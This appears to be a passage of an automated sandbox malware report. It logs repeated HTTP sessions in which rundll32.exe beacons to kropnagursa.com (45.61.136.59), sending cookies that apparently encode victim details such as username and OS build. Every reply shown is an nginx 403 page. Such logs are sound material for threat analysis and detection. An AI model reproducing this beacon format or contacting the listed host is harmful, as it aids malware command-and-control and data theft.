                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            309192.168.2.45000545.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:20:03.099117994 CET2502OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:20:03.264117002 CET2502INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:20:03 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            31192.168.2.44972745.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:18.045264959 CET2147OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:18.213145018 CET2147INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:18 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            310192.168.2.45000645.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:20:03.572449923 CET2503OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:20:03.737195969 CET2503INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:20:03 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            311192.168.2.45000745.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:20:04.259871006 CET2504OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:20:04.425386906 CET2505INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:20:04 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            312192.168.2.45000845.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:20:04.746627092 CET2506OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:20:04.914026022 CET2506INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:20:04 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            313192.168.2.45000945.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:20:05.888048887 CET2507OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:20:06.052648067 CET2507INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:20:05 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            314192.168.2.45001045.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:20:06.367362976 CET2508OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:20:06.533775091 CET2508INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:20:06 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            32192.168.2.44972845.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:18.537034035 CET2148OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:18.702307940 CET2148INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:18 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            33192.168.2.44972945.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:19.148897886 CET2149OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:19.313853979 CET2150INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:19 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            34192.168.2.44973045.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:20.060098886 CET2151OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:20.228760004 CET2151INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:20 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            35192.168.2.44973145.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:20.676623106 CET2152OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:20.841547012 CET2152INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:20 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            36192.168.2.44973245.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:21.168512106 CET2153OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:21.333502054 CET2153INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:21 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            37192.168.2.44973345.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:22.474344969 CET2154OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:22.642986059 CET2155INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:22 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            38192.168.2.44973445.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:22.959903002 CET2156OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:23.124852896 CET2156INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:23 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
                                                                                                                                            Feb 2, 2023 21:17:23.240948915 CET2156OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:23.406428099 CET2157INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:23 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            39192.168.2.44973545.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:23.755532980 CET2158OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:23.920664072 CET2158INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:23 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
